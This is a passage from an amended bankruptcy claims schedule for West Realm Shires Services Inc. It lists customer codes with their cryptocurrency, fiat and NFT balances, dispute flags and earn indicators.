| 07323980 | | USD[6.07] | | |
| 07323982 | | USD[6.11] | | |
| 07323983 | | BRZ[1], CUSDT[1], LINK[0.00311852], LTC[0], SUSHI[.0274494], TRX[2], USD[0.00] | Yes | |
| 07323984 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07323985 | | USD[10.00] | | |
| 07323986 | | USD[10.00] | | |
| 07323989 | | USD[0.01] | | |
| 07323990 | | BRZ[1], CUSDT[1], DAI[0], GRT[1.00498957], TRX[721.5297048], USD[0.00] | Yes | |
| 07323991 | | BRZ[1], CUSDT[5], DOGE[590.40971861], LINK[.38868827], SUSHI[.87224186], TRX[120.45041979], USD[47.52] | Yes | |
| 07323992 | | BTC[.01900668], CUSDT[9], DOGE[1708.22248243], ETH[.08158604], ETHW[.08158604], GRT[1], SHIB[4563605.24814603], TRX[6], USD[859.64] | | |
| 07323994 | | ALGO[.2448], AVAX[0], BTC[0], ETH[0], SOL[0], TRX[.000006], USD[11.88], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323995 | | USD[10.00] | | |
| 07323996 | | BAT[1], DOGE[4554.53610154], MATIC[364.53406965], USD[10.00], USDT[1] | | |
| 07323997 | | USD[10.00] | | |
| 07323998 | | USD[10.00] | | |
| 07323999 | | DOGE[135.98511561], USD[0.00] | | |
| 07324001 | | USD[10.00] | | |
| 07324002 | | USD[0.01], USDT[0] | | |
| 07324004 | | DOGE[.00317298], USD[0.01], USDT[0] | Yes | |
| 07324005 | | CUSDT[1], SOL[0], TRX[1], USD[0.00] | | |
| 07324006 | | TRX[31.70095431], USD[0.05], USDT[.005715] | | |
| 07324007 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07324008 | | DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07324009 | | DOGE[1.0000137], USD[0.00] | | |
| 07324011 | | BTC[.00003244], USD[0.03] | | |
| 07324013 | | BRZ[1], CUSDT[2], DOGE[.00095598], SHIB[5], USD[0.30] | Yes | |
| 07324015 | | USD[10.00] | | |
| 07324016 | | USD[10.00] | | |
| 07324017 | | DOGE[36963], USD[21.00] | | |
| 07324018 | | CUSDT[4], DOGE[0.00000696], TRX[1.00097656], USD[0.36] | | |
| 07324019 | | USD[10.00] | | |
| 07324020 | | BRZ[0], DOGE[5698.05961697], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07324021 | | DOGE[959.76037119], USD[0.00] | | |
| 07324022 | | USD[10.00] | | |
| 07324023 | | USD[10.00] | | |
| 07324024 | | BRZ[1], USD[0.23] | | |
| 07324026 | | USD[10.00] | | |
| 07324027 | | USD[10.00] | | |
| 07324028 | | USD[0.02] | | |
| 07324029 | | BTC[0.00021093], ETH[.7947366], ETHW[0.79473660], MATIC[540], SHIB[59982112.80744469], SOL[3.0012], USD[2.74] | | |
| 07324030 | | USD[0.01] | | |
| 07324032 | | BRZ[1], DOGE[.00000212], USD[0.01] | | |
| 07324034 | | USD[10.00] | | |
| 07324036 | Contingent, Disputed | BF_POINT[300], USD[8.54] | | |
| 07324037 | | BTC[.00021423], USD[0.00] | | |
| 07324038 | | DOGE[456.01359571], USD[0.03] | | |
| 07324040 | | USD[10.00] | | |
| 07324041 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07324042 | | USD[0.00] | | |
| 07324043 | | BRZ[3], CUSDT[9], DOGE[752.47936377], ETH[.36016859], ETHW[.05392055], GRT[1], SHIB[172.17851598], TRX[3], USD[0.00], USDT[1.07440967] | Yes | |
| 07324045 | | BCH[1.11114742], CUSDT[6], DOGE[267.03900989], GRT[26.05005552], LINK[14.45793424], LTC[1.92531476], MATIC[20.86748378], SOL[17.86726437], SUSHI[0], TRX[1848.30132451], UNI[6.38295956], USD[0.00], USDT[1.10599835] | Yes | |
| 07324046 | | USD[10.00] | | |
| 07324047 | | USD[10.00] | | |
| 07324049 | | USD[0.01], USDT[0] | | |
| 07324050 | | USD[10.86] | Yes | |
| 07324051 | | USD[10.00] | | |
| 07324052 | | CUSDT[3], USD[0.06] | | |
| 07324053 | | DOGE[0], LTC[0], TRX[1], USD[0.00], USDT[0] | | |
| 07324054 | | ETH[.00557175], ETHW[.00557175], USD[0.00] | | |
| 07324055 | | USD[10.90] | Yes | |
| 07324056 | | USD[10.00] | | |
| 07324057 | | USD[0.00] | | |
| 07324058 | | BAT[2], BRZ[1], CUSDT[6], DOGE[6587.22319142], GRT[1], TRX[44.817189], USD[0.00], USDT[2] | | |
| 07324059 | | USD[10.00] | | |
| 07324060 | | USD[10.00] | | |
| 07324062 | | USD[10.00] | | |
| 07324064 | | USD[10.00] | | |
| 07324065 | | USD[10.00] | | |
| 07324066 | | USD[7.32] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324067 | | USD[10.00] | | |
| 07324068 | | DOGE[1.00981772], USD[299.37] | | |
| 07324069 | | USD[0.00] | Yes | |
| 07324070 | | BAT[6.4372596], BRZ[11.80164359], BTC[.03918153], CUSDT[10], DOGE[2261.96882839], ETH[1.06913061], ETHW[1.078272801], GRT[10.60496466], LTC[5.99816998], SHIB[1907509.97695566], TRX[16.754568511], UNI[2.14575282], USD[0.00], USDT[5.36438343] | | |
| 07324072 | | USD[10.00] | | |
| 07324074 | | ETHW[.03686083], USD[301.29] | Yes | |
| 07324075 | | USD[0.01] | Yes | |
| 07324078 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[217.55] | | |
| 07324080 | | USD[10.00] | | |
| 07324081 | | USD[10.00] | | |
| 07324082 | | CUSDT[2], ETH[0.00888127], ETHW[0.00877183], USD[0.00] | Yes | |
| 07324084 | | CUSDT[2], DOGE[155.87449964], SUSHI[.0000375], TRX[16.96616236], USD[0.00] | | |
| 07324085 | | BRZ[1], DOGE[7787.89199136], TRX[2], USD[0.00] | Yes | |
| 07324086 | | CUSDT[1], DOGE[1.00009904], USD[0.00] | | |
| 07324087 | | TRX[1], USD[1.00] | Yes | |
| 07324088 | | USD[10.00] | | |
| 07324089 | | USD[10.00] | | |
| 07324091 | | BAT[129.28874286], BRZ[2], BTC[.0076287], CUSDT[6], DOGE[1], ETH[.09946782], ETHW[.09946782], TRX[1], USD[0.01] | | |
| 07324092 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07324094 | | USD[10.00] | | |
| 07324095 | | BTC[0], DAI[4.54291820], DOGE[0.07000000], ETH[.00000001], ETHW[0], LTC[0], NFT (319507044492964920/Beasts #759)[1], NFT (328939990636930821/Birth of $SOL-hana)[1], NFT (330817562130316522/Monke: Bagsy)[1], NFT (339015958340077448/"Dude Index" Vibe Meter)[1], NFT (375192024392420714/Cosmic Creations #663)[1], NFT (392681615220113132/Beasts #967)[1], NFT (413552937029587026/Squid Prize Acceptance)[1], NFT (513024025203003249/fordudesake remix)[1], NFT (567731919322504686/Sun Set #350)[1], NFT (576395776765576029/Squid Prize Acceptance #2)[1], SOL[0], TRX[.000016], USD[204.11], USDT[0.17710410] | | |
| 07324096 | | USD[10.00] | | |
| 07324097 | | CUSDT[1], DOGE[.00001003], USD[0.01] | | |
| 07324099 | | CUSDT[4], TRX[2], USD[0.00] | Yes | |
| 07324100 | | USD[10.00] | | |
| 07324101 | | USD[10.00] | | |
| 07324103 | | CUSDT[0], DOGE[0], ETH[0.00000001], ETHW[0.00000001], USD[0.00], USDT[0] | Yes | |
| 07324105 | | USD[10.00] | | |
| 07324106 | | BF_POINT[300], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07324107 | | CUSDT[1], USD[0.01] | | |
| 07324109 | | CUSDT[10], DOGE[708.72679153], ETH[.04385456], ETHW[.04385456], LTC[.18002258], MATIC[13.1350653], SHIB[504744.59923278], SOL[1.32481681], TRX[605.17799727], USD[0.00] | | |
| 07324110 | | BRZ[1], BTC[.00208183], DOGE[2304.87235399], LINK[1.14052371], LTC[.11256605], SOL[1.04890049], TRX[1], USD[0.00] | Yes | |
| 07324111 | | USD[10.00] | | |
| 07324112 | | USD[10.00] | | |
| 07324114 | | USD[0.89] | Yes | |
| 07324115 | | BRZ[1], BTC[.00688168], CUSDT[9], DOGE[6722.02254022], TRX[4], USD[0.01] | Yes | |
| 07324117 | | USD[1.71] | | |
| 07324120 | | USD[10.00] | | |
| 07324121 | | USD[10.00] | | |
| 07324122 | | USD[10.77] | Yes | |
| 07324123 | | BAT[.00004856], CUSDT[2], DOGE[2700.15462747], TRX[1.94154771], USD[0.00] | Yes | |
| 07324124 | | USD[0.63] | Yes | |
| 07324125 | | DOGE[2838.37345722], USD[0.00] | | |
| 07324126 | | TRX[198.63924173], USD[0.00] | | |
| 07324128 | | BTC[0], DOGE[0], ETH[0.76232697], ETHW[0.76232697], SOL[0], TRX[.000001], USD[0.00], USDT[0.00000097] | | |
| 07324129 | | DOGE[220.90016667], USD[0.00] | | |
| 07324131 | | BTC[0.01144707], USD[0.00] | | |
| 07324132 | | USD[4.42] | | |
| 07324134 | | BRZ[2], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07324135 | | CUSDT[1], SUSHI[.66938968], USD[0.00] | | |
| 07324136 | | USD[10.00] | | |
| 07324137 | | USD[10.00] | | |
| 07324138 | | DOGE[9], USD[0.00] | | |
| 07324141 | | BRZ[1], DOGE[84549.54372088], SHIB[135501.35501355], USD[0.00] | | |
| 07324142 | | CUSDT[10], DOGE[150.48631387], TRX[2], USD[0.00] | | |
| 07324143 | | LINK[.00174274], SUSHI[.68417982], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324144 | | CUSDT[2], GRT[1], TRX[1], UNI[1], USD[592.67] | | |
| 07324145 | | USD[0.00] | | |
| 07324146 | | USD[0.01] | Yes | |
| 07324147 | | BAT[90.4759888], BRZ[2], CUSDT[5], DOGE[2176.51558193], GRT[25.84842406], MATIC[50.39476613], SHIB[1606235.50390439], SOL[.00001367], TRX[1613.58454149], USD[302.42] | Yes | |
| 07324148 | | DOGE[.19435], ETH[.06294015], ETHW[.06294015], USD[0.54], USDT[0] | | |
| 07324149 | | DOGE[1.00003823], USD[0.00] | | |
| 07324150 | | DAI[11.00015656], USD[0.00] | Yes | |
| 07324151 | | CUSDT[5], DOGE[1.01026793], ETH[.12040375], ETHW[0.11924271], SHIB[6278101.15819603], TRX[2], USD[0.00] | Yes | |
| 07324152 | | BTC[.00020786], DOGE[183.51306585], TRX[1], USD[0.00] | | |
| 07324153 | | BRZ[0], BTC[0.00000614], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07324154 | | DOGE[165.89811599], USD[0.00] | | |
| 07324155 | | CUSDT[1], DOGE[4], USD[0.01] | | |
| 07324156 | | USD[0.00] | | |
| 07324157 | | USD[10.00] | | |
| 07324159 | | USD[0.01], USDT[0] | | |
| 07324160 | | USD[10.00] | | |
| 07324161 | | CUSDT[1], DOGE[2271.2007428], USD[0.00] | | |
| 07324162 | | BTC[0], DOGE[95524.54975933], ETH[0], SHIB[6200000], USD[0.00] | | |
| 07324163 | | CUSDT[7], DOGE[122.86100555], MATIC[49.0942636], TRX[350.23526585], UNI[6.7708203], USD[1605.22] | Yes | |
| 07324164 | | BTC[0], DOGE[0] | | |
| 07324166 | | USD[0.00] | | |
| 07324168 | | DOGE[1], UNI[.34663175], USD[0.00] | | |
| 07324170 | | DOGE[575.424], USD[0.21] | | |
| 07324171 | | BRZ[2], CUSDT[3], TRX[6], USD[0.00] | Yes | |
| 07324172 | | USD[10.00] | | |
| 07324173 | | USD[0.01], USDT[0] | | |
| 07324176 | | USD[10.00] | | |
| 07324178 | | USD[10.00] | | |
| 07324179 | | USD[0.02] | | |
| 07324181 | | CUSDT[3], TRX[1], USD[0.08] | | |
| 07324182 | | DOGE[0.95017672], USD[43.46] | | |
| 07324183 | | USD[10.00] | | |
| 07324184 | | USD[0.58], USDT[0] | | |
| 07324185 | | USD[10.00] | | |
| 07324186 | | DOGE[1], USD[13.45] | | |
| 07324187 | | DOGE[0.23375855], USD[0.86] | | |
| 07324188 | | ETH[.010655], ETHW[3.700655], USD[4.02] | | |
| 07324189 | | USD[10.00] | | |
| 07324190 | | USD[10.00] | | |
| 07324191 | | BTC[0], CUSDT[2], USD[0.01] | | |
| 07324192 | | USD[0.01] | | |
| 07324193 | | CUSDT[234.5323496], DOGE[12.21764712], USD[0.00] | | |
| 07324194 | | BTC[.00067504], DOGE[51.16546785], ETH[.00477945], ETHW[.00477945], TRX[1], USD[0.00] | | |
| 07324195 | | ETH[0.00001113], ETHW[0.00001112], SOL[0.00012844], USD[0.01] | Yes | |
| 07324197 | | DOGE[0], TRX[0], USD[10.00] | | |
| 07324198 | | USD[10.00] | | |
| 07324200 | | BTC[0.19267274], ETH[.0004689], ETHW[.0004689], SOL[.0041095], SUSHI[.03165], USDT[0] | | |
| 07324202 | | BTC[.00013713], CUSDT[1], DOGE[2242.44612432], ETH[.00212867], ETHW[.00210131], TRX[2], USD[0.00] | Yes | |
| 07324206 | | BTC[0], DOGE[0.02659839], ETH[0.00073350], ETHW[0.00073350], USD[0.00] | | |
| 07324207 | | USD[0.00] | Yes | |
| 07324208 | | USD[10.00] | | |
| 07324209 | | USD[10.00] | | |
| 07324210 | | CUSDT[1], DOGE[1187.36496362], USD[0.00] | | |
| 07324211 | | USD[10.00] | | |
| 07324212 | | USD[10.00] | | |
| 07324215 | | CUSDT[7], DAI[.00008646], DOGE[4], SHIB[1], USD[0.00], USDT[0] | | |
| 07324217 | | USD[10.00] | | |
| 07324219 | | TRX[220.116], USD[0.43] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324220 | | BTC[0], DOGE[0], ETH[.00000001], GRT[0], LINK[0.00009136], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07324223 | | DOGE[24.07692272], USD[0.00] | | |
| 07324225 | Contingent, Disputed | USD[10.00] | | |
| 07324227 | | BRZ[1], CUSDT[1], DOGE[1.35053777], ETH[.61198455], ETHW[.61198455], GRT[4], TRX[1], USD[0.00] | | |
| 07324228 | | BRZ[0], BTC[0.16676394], DOGE[4649.42855755], ETH[0.39669174], ETHW[0.39654648], SHIB[4199780.40658964], SOL[338.22575860], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07324229 | | DOGE[351.6015776], USD[10.00] | | |
| 07324231 | | CUSDT[1], DOGE[335.02968998], SOL[1.50946892], TRX[1], USD[0.00] | | |
| 07324233 | | ETH[.00648014], ETHW[.00648014], USD[0.00] | | |
| 07324235 | | MATIC[6.69989865], USD[0.00] | | |
| 07324237 | | USD[10.00] | | |
| 07324238 | | BCH[.16495103], BRZ[1], DOGE[89.1427375], TRX[2], USD[0.00] | | |
| 07324239 | | CUSDT[4], DOGE[0], MATIC[.00135355], TRX[.02113687], USD[0.00] | Yes | |
| 07324241 | | BAT[1], CUSDT[3], ETH[.00000309], ETHW[.00000309], GRT[1.00173187], SHIB[2], SOL[0], TRX[5], USD[0.00], USDT[0.00000003] | Yes | |
| 07324242 | | USD[10.00] | | |
| 07324243 | | USD[11.01] | Yes | |
| 07324244 | | BAT[2], BRZ[4], BTC[.00001264], DOGE[2.13033841], GRT[4], LINK[1.00041756], SHIB[2], TRX[6], USD[0.00], USDT[1.00019874] | Yes | |
| 07324245 | | DOGE[0.26021857], USD[0.00] | | |
| 07324248 | | CUSDT[1], DOGE[2], ETHW[.50242181], TRX[1], USD[0.00] | Yes | |
| 07324249 | | USD[10.00] | | |
| 07324250 | | DOGE[1], ETH[.05039051], ETHW[.05039051], SOL[1.91971691], USD[0.00] | | |
| 07324251 | | BRZ[1], BTC[.00072738], DOGE[37.98764209], USD[0.01] | | |
| 07324252 | | UNI[.39639527], USD[12.97] | | |
| 07324253 | | DOGE[0], USD[0.00] | Yes | |
| 07324254 | | USD[10.00] | | |
| 07324255 | | USD[10.64] | Yes | |
| 07324256 | | USD[10.00] | | |
| 07324257 | | USD[0.00] | | |
| 07324258 | | USD[10.00] | | |
| 07324261 | | USD[11.08] | Yes | |
| 07324262 | | BRZ[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07324263 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07324264 | | BTC[.00006627], CUSDT[2], DOGE[.03640132], TRX[1], USD[1.03] | | |
| 07324266 | | USD[10.00] | | |
| 07324267 | | USD[10.00] | | |
| 07324268 | | USD[10.00] | | |
| 07324269 | | CUSDT[3], DOGE[1], NFT [494115393438347981/Saudi Arabia Ticket Stub #65][1], SOL[0.52105115], USD[0.00] | Yes | |
| 07324270 | | BRZ[1], DOGE[879.55981173], GRT[1], USD[0.06] | | |
| 07324273 | | BF_POINT[300], BTC[.00169795], CUSDT[3], DOGE[360.39994067], NFT [325015785608061784/Yoga Woman #6 - Radha][1], NFT [365159261611859667/Rapid Moon Rocket - RMRV155][1], NFT [394092870955037497/Astronot Dog][1], NFT [495422326937564380/Bus life ][1], NFT [558890480333557924/Back 9][1], TRX[474.66288091], USD[0.00] | Yes | |
| 07324275 | | ETH[0], USD[2.09] | | |
| 07324276 | | BTC[0], DOGE[0], GRT[0], SOL[.00380753], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07324279 | | BTC[0], DOGE[1], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07324280 | | USD[10.00] | | |
| 07324284 | | BTC[.09597575], DOGE[19.44451245], ETH[1.07290218], ETHW[1.07245149], USD[0.00] | Yes | |
| 07324285 | | USD[10.00] | | |
| 07324286 | | ETH[.00079859], ETHW[0.00079859], SOL[1.72888496], USD[0.09] | | |
| 07324287 | | TRX[1], USD[0.00] | | |
| 07324289 | | USD[10.00] | | |
| 07324290 | | BAT[18.40940131], BTC[.00057469], CUSDT[2], DOGE[124.66781021], SUSHI[1.93703819], TRX[502.03373094], USD[0.00] | | |
| 07324291 | | USD[10.00] | | |
| 07324292 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07324293 | | USD[0.01] | | |
| 07324294 | | BTC[0], DOGE[1], SHIB[1], USD[0.00] | Yes | |
| 07324295 | | CUSDT[2], DOGE[.00004891], ETH[0], USD[0.01] | | |
| 07324296 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07324297 | | USD[10.00] | | |
| 07324298 | | DOGE[25.80546667], USD[0.00] | | |
| 07324299 | | SOL[0] | | |
| 07324300 | | USD[10.00] | | |

West Realm Shires Services Inc.

Amended Schedule F-12 priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324303 | | BCH[.02325904], BRZ[1], BTC[.00000024], CUSDT[1], DOGE[23], ETH[.0064014], ETHW[.0064014], GRT[12.248274], LINK[.42269505], LTC[.06856581], SOL[126.81689242], SUSHI[.79475912], TRX[1], UNI[.57728763], USD[0.00], YFI[.00034235] | | |
| 07324304 | | BAT[1.0165555], BRZ[1], CUSDT[6], DOGE[18.52870398], GRT[22.055946], LINK[.00001236], SHIB[1566087.88757986], TRX[3], USD[14.69], USDT[0] | Yes | |
| 07324305 | | DOGE[.00000405], USD[9.66] | | |
| 07324306 | | DOGE[292.15498759], USD[14.83] | | |
| 07324307 | | USD[10.00] | | |
| 07324308 | | USD[10.00] | | |
| 07324310 | | BRZ[0], CUSDT[1.00003467], DOGE[2.53857355], UNI[0], USD[0.00], USDT[0] | | |
| 07324312 | | CUSDT[4], DOGE[2], TRX[1], USD[0.01] | Yes | |
| 07324313 | | BAT[1.01655403], BRZ[2.00010996], CUSDT[1], DOGE[2], ETH[1.10298072], ETHW[1.1025175], GRT[1.00313541], SOL[23.09001957], TRX[4], USD[0.07], USDT[0.00000001] | Yes | |
| 07324314 | | CUSDT[9], DOGE[0], TRX[3], USD[0.02] | | |
| 07324315 | | USD[508.34], USDT[0.00000001] | | |
| 07324316 | | BAT[1], BRZ[1], DOGE[1], ETH[0], LINK[0], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07324317 | | USD[10.00] | | |
| 07324318 | | BRZ[1], CUSDT[23], DOGE[11.74033521], ETH[.00000083], ETHW[.00000083], SHIB[1], TRX[8], USD[0.01], USDT[1.10937702] | Yes | |
| 07324320 | | CUSDT[1], USD[0.00] | Yes | |
| 07324322 | | CUSDT[2], DOGE[2], TRX[3], USD[0.00] | | |
| 07324323 | | USD[10.00] | | |
| 07324324 | | BTC[.00002296], DOGE[20229.54230738], TRX[19654.068], USD[2.48] | | |
| 07324325 | | USD[10.00] | | |
| 07324326 | | NFT[492195920665925750/Shaq's Fun House Commemorative Ticket #66][1], USD[10.58] | Yes | |
| 07324328 | | CUSDT[1], DOGE[1], NFT[503099234512247795/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #75][1], TRX[1], USD[36.55] | | |
| 07324329 | | USD[10.00] | | |
| 07324330 | | BAT[2], CUSDT[5], DOGE[0], GRT[1], TRX[1], USD[0.01] | | |
| 07324332 | | USD[10.00] | | |
| 07324333 | | USD[10.00] | | |
| 07324335 | | DOGE[1], USD[26.58], USDT[0.00000001] | | |
| 07324337 | | USD[3.43] | | |
| 07324338 | | DOGE[1.00883506], USD[0.00] | | |
| 07324340 | | USD[0.00] | | |
| 07324341 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07324343 | | CUSDT[3], SHIB[354240.74645681], USD[0.00] | Yes | |
| 07324344 | | DOGE[86.00764914], SHIB[441378.71088300], USD[30.00] | | |
| 07324345 | | USD[0.00] | | |
| 07324346 | | BTC[.00000371], USD[0.05], USDT[0] | | |
| 07324347 | | USD[10.00] | | |
| 07324348 | | CUSDT[1], USD[0.01] | | |
| 07324349 | | BAT[4], BRZ[4], CUSDT[4], DOGE[3], GRT[1], TRX[1], USD[0.00], USDT[3] | | |
| 07324350 | | DOGE[1], SOL[72.36330017], TRX[188.0441531], USD[0.00] | Yes | |
| 07324351 | | USD[10.00] | | |
| 07324352 | | BTC[0.00214900], DOGE[1474.13826455], ETH[.005742], ETHW[.005742], GRT[0], LINK[0], SOL[4.62333447], SUSHI[0], TRX[0] | | |
| 07324353 | | USD[0.00] | | |
| 07324354 | | BRZ[1], CUSDT[1.00002509], ETH[.00002873], ETHW[.00002873], USD[0.01], USDT[1] | | |
| 07324356 | | BRZ[1], DAI[.00009499], DOGE[2], USD[0.00] | | |
| 07324357 | | USD[10.00] | | |
| 07324358 | | DOGE[30.01351898], USD[0.00] | | |
| 07324360 | | USD[15.10] | | |
| 07324361 | | USD[10.00] | | |
| 07324362 | | CUSDT[3], ETH[.0144324], ETHW[.0144324], TRX[2], USD[0.01] | | |
| 07324363 | | DOGE[.635], USD[0.63] | | |
| 07324364 | | CUSDT[1], DOGE[28.42257876], USD[0.32] | | |
| 07324366 | | DOGE[.652], USD[174.28] | | |
| 07324367 | | DOGE[132.67774605], USD[0.00] | | |
| 07324368 | | USD[10.00] | | |
| 07324370 | | CUSDT[2], DOGE[3604.27592003], SHIB[1], USD[0.00] | | |
| 07324373 | | BAT[1.0165555], BRZ[1], USD[0.01] | Yes | |
| 07324374 | | DOGE[4.20399314], SHIB[9124.08759124], USD[0.00], USDT[0] | Yes | |
| 07324375 | | USD[10.00] | | |
| 07324376 | | TRX[.06722386], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324377 | | BCH[.00019337], BTC[.00006491], CUSDT[9], DOGE[6.49700466], ETH[.00038309], ETHW[.00038309], SHIB[1], TRX[3], USD[0.00] | Yes | |
| 07324378 | | USD[57.59] | | |
| 07324379 | | USD[10.00] | | |
| 07324380 | | BRZ[1], DOGE[5], TRX[2618.18823064], USD[0.00] | | |
| 07324381 | | USD[10.00] | | |
| 07324383 | | BF_POINT[300], CUSDT[2], GRT[1.0000913], SHIB[2832181.44709543], USD[0.00], USDT[0.00009992] | Yes | |
| 07324384 | | BRZ[0], BTC[0], CUSDT[0], DOGE[1], ETH[0], ETHW[0], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07324386 | | BRZ[1], DOGE[3381.50070906], USD[10.00] | | |
| 07324387 | | USD[10.00] | | |
| 07324388 | | USD[0.00] | | |
| 07324389 | | CUSDT[1], DOGE[3002.88765322], USD[0.00] | | |
| 07324390 | | USD[11.09] | Yes | |
| 07324391 | | NFT (474208239620469523/Coachella x FTX Weekend 1 #3618)[1], USD[10.00] | | |
| 07324392 | | DOGE[0], ETH[0], ETHW[0] | | |
| 07324394 | | DOGE[14.76160742], USD[0.00] | | |
| 07324396 | | CUSDT[1], DOGE[1], USD[0.00], USDT[2] | | |
| 07324397 | | BTC[0], CUSDT[1], DOGE[3], LINK[0], USD[0.00] | | |
| 07324399 | | USD[10.00] | | |
| 07324400 | | USD[10.00] | | |
| 07324401 | | CUSDT[1], DOGE[.33138032], USD[0.00] | | |
| 07324402 | | BAT[2], BRZ[2], CUSDT[1], USD[0.00] | | |
| 07324403 | | DOGE[.714], SOL[.0912], SUSHI[.192], USD[0.85] | | |
| 07324404 | | USD[10.00] | | |
| 07324407 | | USD[10.00] | | |
| 07324408 | | USD[10.00] | | |
| 07324409 | | USD[10.00] | | |
| 07324411 | | CUSDT[6], DOGE[2], SOL[1.21962903], SUSHI[2.21384095], TRX[3], USD[0.00] | Yes | |
| 07324413 | | BRZ[1], USD[0.00], USDT[0.00000001] | | |
| 07324414 | | USD[10.00] | | |
| 07324415 | | DOGE[91.94387745], USD[0.00] | | |
| 07324417 | | CUSDT[1], USD[0.01] | | |
| 07324418 | | BTC[.00020906], USD[0.00] | Yes | |
| 07324419 | | USD[10.00] | | |
| 07324420 | | CUSDT[5], DOGE[1], LINK[.00003401], TRX[2], USD[168.73], USDT[1] | | |
| 07324422 | | CUSDT[3], DOGE[3], ETH[0], SOL[0], TRX[2], USD[0.01] | | |
| 07324423 | | CUSDT[1], DOGE[169.32900081], USD[43.65] | Yes | |
| 07324426 | | USD[10.00] | | |
| 07324429 | | DOGE[47.70224393], USD[0.30] | | |
| 07324430 | | DOGE[0], SUSHI[.00127121], TRX[2], USD[0.45] | | |
| 07324431 | | USD[10.00] | | |
| 07324432 | | USD[10.00] | | |
| 07324433 | | USD[10.00] | | |
| 07324435 | | DOGE[102.68573456], GRT[1.00136155], USD[0.01] | Yes | |
| 07324436 | | USD[10.00] | | |
| 07324437 | | BTC[0], CUSDT[6], DOGE[0], ETH[0.03036455], ETHW[0.03036455], LTC[0], USD[0.00] | | |
| 07324438 | | USD[10.00] | | |
| 07324439 | | BAT[1], BRZ[1], BTC[0], DOGE[0], TRX[2], UNI[0], USD[0.00], USDT[2] | | |
| 07324440 | | USD[10.00] | | |
| 07324441 | | BTC[.00016643], USD[0.00] | | |
| 07324442 | | DOGE[151.78978615], USD[0.00] | Yes | |
| 07324443 | | USD[10.00] | | |
| 07324444 | | BRZ[1], BTC[0], CUSDT[17], DOGE[0], MATIC[0], TRX[2], USD[0.00] | | |
| 07324445 | | CUSDT[1], USD[0.58] | | |
| 07324446 | | USD[10.00] | | |
| 07324447 | | BRZ[4], CUSDT[36], TRX[5], USD[0.00] | | |
| 07324448 | | USD[0.00] | | |
| 07324449 | | DOGE[296.09764424], TRX[1], USD[0.00] | | |
| 07324452 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324453 | | USD[10.00] | | |
| 07324455 | | CUSDT[1], DOGE[1.02475271], USD[0.00], USDT[1] | | |
| 07324456 | | DOGE[0] | | |
| 07324457 | | USD[10.00] | | |
| 07324460 | | USD[10.00] | | |
| 07324461 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], GRT[1], TRX[3], USD[0.39] | | |
| 07324463 | | BTC[0], DOGE[0], LINK[0], PAXG[0], USD[0.01] | Yes | |
| 07324464 | | USD[0.05] | | |
| 07324465 | | DOGE[1767.42599681], LTC[.04431054], USD[0.00], USDT[2] | | |
| 07324466 | | USD[10.00] | | |
| 07324467 | | TRX[1], USD[357.68] | Yes | |
| 07324468 | | DOGE[0], USD[3.95] | | |
| 07324469 | | USD[10.00] | | |
| 07324470 | | DOGE[ 6444], USD[314.74] | | |
| 07324471 | | USD[10.00] | | |
| 07324472 | | USD[10.00] | | |
| 07324473 | | USD[10.00] | | |
| 07324474 | | USD[10.00] | | |
| 07324475 | | USD[0.00] | | |
| 07324476 | | USD[10.00] | | |
| 07324477 | | USD[10.00] | | |
| 07324478 | | SHIB[.02747252], SOL[.00000005], USD[0.00] | Yes | |
| 07324479 | | USD[10.00] | | |
| 07324480 | | USD[0.00] | | |
| 07324481 | | BAT[3.05281552], BRZ[11.58810496], CUSDT[21], DOGE[17.89035605], ETH[.03278013], SHIB[23], SUSHI[.00006034], TRX[19.40369928], UNI[.00158975], USD[0.00], USDT[1.01750305] | Yes | |
| 07324484 | | USD[10.00] | | |
